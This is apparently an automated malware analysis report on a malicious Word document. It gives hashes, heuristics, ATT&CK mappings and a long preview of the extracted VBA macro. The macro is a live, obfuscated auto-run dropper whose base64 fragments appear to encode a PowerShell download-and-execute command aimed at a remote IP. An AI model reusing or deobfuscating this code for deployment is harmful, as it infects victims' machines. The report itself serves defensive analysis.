Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 669a256dc8a32d60…

MALICIOUS

Office (OLE)

207.0 KB Created: 2017-12-04 05:40:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 910f1ec4e426423f1f8ef34df28d87ff SHA-1: 14c6e4db2c730ce1b688764f065f1c385a18e88f SHA-256: 669a256dc8a32d6091474c0b0d47d148ccffa0d3cb602bdf305243dd923e369b
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The critical 'OLE_VBA_SHELL' heuristic indicates the use of the Shell() function, and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic confirms this is triggered by the Document_Open auto-execution macro. This suggests the macro is designed to execute a command or script, likely to download and run a secondary payload. The ClamAV detection further confirms its malicious nature.

Heuristics 7

  • ClamAV: Doc.Macro.Obfuscation-6332451-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6332451-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17942 bytes
SHA-256: 4c9339ebd0b3f5a9b054e6aae43f64d2a8b9724c5781d38b696c8de9d63d809a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Dim zjC1PJd
zjC1PJd = Array("vUZEPc925", "obv0PGcu", "Ruyn1EWOV")
zmyTskrW = zjC1PJd(1)
hsAXlpOeV = "MVkJ5YjJObGMzTWdKSEJoZEdnN1luSmxZV3M3ZldOaGRHTm"
H8yNg = "9lM"
tFXuPiEO5 = "zE5"
Dim jTkOcbL
jTkOcbL = Array("SUv2LM5", "OvLxJbE", "Hk4ot")
xE9Hn = jTkOcbL(0)
Dim aNYcAg
aNYcAg = Array("C9qM5Ljpz", "uWNQGmgTh", "IixGM3")
kgHBS = aNYcAg(1)
Dim F91Ip8
F91Ip8 = Array("TSFkGZc")
xEsSv = F91Ip8(0)
Dim yH40B
yH40B = hsAXlpOeV & H8yNg & tFXuPiEO5
uGqnI = "WTIxa0lDOXJJSE"
I6TgoJfGZ = "5sZENCZlVFOVhSVkk5Y0c5M1pYSW1KaUJ6WlhRZ1gxTklSVXhNUFhOb1pXeHNKaVlnWTJGc2JDQWxYM"
FOCVx6JN = "UJQVjBWU0pTVmZVMGhGVEV3bElDUjNaV0pqYkdsbGJuUWdQU0J1WlhjdGIySnFaV04wSUZONWMzUmxiUzVPWlhRdVYyVmlRMnhwWlc1ME95UnRlWFZ5YkhNZ1BTQW5hSFIwY0Rvdkx6RTVNQzR4TkM0ek9DNDNOeTlyWlhsaWIyRnlaQ"
Gfn02T3cw = "zV5ZENjdVUzQnNhWFFvSnl3bktUc2tjR0YwYUNBOUlDUmxiblk2ZEdWdGNDQXJJQ2RjZm5SdGNDNWxlR1VuTzJadmNtVmhZMmdvSkcxNWRYSnNJR2x1SUNSdGVYVnliSE1wZTNSeWVYc2tkMlZpWTJ4cFpXNTBMa1J2ZDI1c2IyRmtSbWxzWlNna2JYbDFjbXd1Vkc5VGRISnBibWNvS1N3Z0pIQmhkR2dwTzFOMFlYSjB"
Dim OH8PCFL
OH8PCFL = Array("wSbWQaP", "C02w5vCU", "ijW6sMxnP")
BMfLrcb = OH8PCFL(2)
Dim JiEY6Fhmx
JiEY6Fhmx = uGqnI & I6TgoJfGZ & FOCVx6JN & Gfn02T3cw
Dim cM7eK0qR
cM7eK0qR = Array("kEbG0q", "MqwIEpMd")
e07Pqtdm = cM7eK0qR(1)
A2fKdOV = JiEY6Fhmx & yH40B
Dim JOCtUjaq
JOCtUjaq = Array("qi9hWJgE", "j2F58c")
mcm3YAIqZ = JOCtUjaq(0)

Dim egUe1dTX
egUe1dTX = Array("kQpcWSM")
rEanVSJ8 = egUe1dTX(0)
Dim mnA1pK5G
mnA1pK5G = Array("OYKe6pMrd", "dVe8pwNb")
pUn0IE1 = mnA1pK5G(1)
sex A2fKdOV
End Sub

Attribute VB_Name = "A9XQhfE4j"
Sub sex(EFmTL)
If Len("a5T9d") <> 252 Then
' DwrlvD
Else
' kBqRn5Cf
MsgBox "vj14GlWiX", 2, "t5Lgi"
End If
If Len("usBDZF1O") <> 252 Then
' m6fgE
Else
' II3U7
MsgBox "d1PNf", 2, "pgrs5"
End If
If Len("qyuXh") <> 138 Then
' ThWJDrwgY
Else
' NMBdo
MsgBox "kZOpE9o", 14, "znaVroMj4"
End If
Dim EwkYo
EwkYo = Array("G8leFXj", "S6ngSHJ")
S8UoND = EwkYo(1)
If Len("q5kOPsf4") <> 207 Then
' A1KLj4XT
Else
' DJ9i7qK
MsgBox "uDdr3", 46, "gFjJmw"
End If
Dim Nu0Y1h2
Nu0Y1h2 = Array("sqX1Le", "IUnoL")
Mw91iU = Nu0Y1h2(0)
If Len("QErS3I") <> 204 Then
' DUJ96XmwF
Else
' jKZk6JQ1
MsgBox "fZd1arF2", 63, "zi95G"
End If
If Len("W39Ac") <> 204 Then
' tPdkSG5lI
Else
' d5N2qd
MsgBox "EPVq5", 63, "hMSftBz"
End If
Dim knu8S
knu8S = Array("KO7Edn", "k8wXYV", "lXQiN")
UILf6GZ = knu8S(2)
Dim jkbuU
jkbuU = Array("zYFyXlJv", "becgPqt4")
ZpAD5 = jkbuU(0)
Dim P4AwW60
P4AwW60 = Array("uC87THo3", "pl0KM")
KXpd6vS7 = P4AwW60(1)
Dim C4T3asUw
C4T3asUw = Array("TY6WLZx")
uplD1Lk = C4T3asUw(0)
Dim G7SUY
G7SUY = Array("fQebMvs", "hBwyGUuoJ")
WihGNWuQ = G7SUY(0)
If Len("PjxR0hB") <> 231 Then
' Z9ErS
Else
' ZXBsth9f
MsgBox "OHJACc3R4", 8, "vIWAk6z7"
End If
If Len("wUVIFZ") <> 133 Then
' X6cJOKE1
Else
' tNuXbDEJP
MsgBox "dDSThefx", 23, "JVXW0"
End If
Dim sjkT8
sjkT8 = Array("yE5alcwt", "QmedRrO8", "hIsNEDUTp")
gLGiJ5Hc = sjkT8(1)
If Len("eKuTzQ8") <> 185 Then
' MbEZVQ
Else
' R963QN
MsgBox "FhQAx", 44, "KozmDG"
End If
If Len("OIVcu0O") <> 185 Then
' PMyY1n
Else
' x0GiszTgy
MsgBox "xWXytp", 44, "aUnT4Qx"
End If
Dim bNDaxRk8
bNDaxRk8 = Array("UHsjkayL", "xOEWyFR", "ex97JZPlL")
Xxmb8zPuY = bNDaxRk8(2)
Dim scSMo0Z
scSMo0Z = Array("ICMKraQ", "cWXPKI0Al")
SZoKuI = scSMo0Z(1)
Dim ISd2n
ISd2n = Array("fuXWwkyF3", "aNnys")
EpmS2 = ISd2n(1)
Dim byOloUujY
byOloUujY = Array("nbYZARun", "sKc2uM41", "c947OtN")
IdHaekgY = byOloUujY(1)
If Len("rLzdwsbS") <> 146 Then
' Qxq3RmVk1
Else
' jTdlE
MsgBox "rY3X8TRQ", 19, "bhd6iF1I"
End If
If Len("mwKWtn") <> 200 Then
' o1eExu
Else
' VmrBN6
MsgBox "StjfEdIyW", 29, "Aowr74"
End If
Dim UZgE7O
UZgE7O = Array("Ockvia0")
KvCfxN = UZgE7O(0)
Dim k8rVAS6Y
k8rVAS6Y = Array("b7uIk", "d3ugvOo", "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.